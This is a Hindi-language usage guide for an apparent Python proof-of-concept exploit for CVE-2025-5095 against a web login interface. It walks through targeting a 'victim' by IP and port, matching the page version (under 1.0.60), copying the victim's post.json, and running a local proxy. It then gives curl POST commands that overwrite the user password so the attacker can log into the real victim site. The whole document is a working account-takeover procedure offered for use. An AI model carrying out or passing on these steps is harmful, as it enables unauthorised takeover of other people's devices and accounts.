
CVE-2025-5095 के लिए Python POC
उपयोग कैसे करें:
Login.htm खोलें और उन स्थानों को संपादित करें जहाँ IP:PORT पीड़ित (victim) का पता है
var LoginVersion = "Check On The Victim Site"; भाग को पीड़ित पृष्ठ के संस्करण में संपादित करें, इससे आप पीड़ित पृष्ठ पर जाकर उसका सोर्स देख सकते हैं चेतावनी: यह CVE केवल 1.0.60 से पुराने संस्करणों पर काम करता है
पीड़ित साइट से post.json फ़ाइल डाउनलोड करें (http://victimip:port/post.json) इसे स्क्रिप्ट फ़ोल्डर में ले जाएँ और आपके पास 3 फ़ाइलें होंगी
अब पायथन फ़ाइल चलाएँ और 127.0.0.1:8080/login.htm एक्सेस करें (यदि पोर्ट 8080 पहले से उपयोग में है, तो आप स्क्रिप्ट को टेक्स्ट एडिटर में खोलकर अंतिम भाग बदल सकते हैं)
लॉगिन पृष्ठ खोलते समय अलर्ट को अनदेखा करें
एक टर्मिनल खोलें और इन curl कमांड्स का उपयोग करें, यदि यह "success" प्रिंट करता है तो यह काम कर गया।
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
यह जाँचने के लिए कि पृष्ठ बदल गया है, यह कमांड भेजें:
curl http://localhost:8080/check_password
अब, पीड़ित साइट पर जाएँ (localhost वाली नहीं) और नया पासवर्ड डालें, इस उदाहरण में, पासवर्ड "newtestpass" है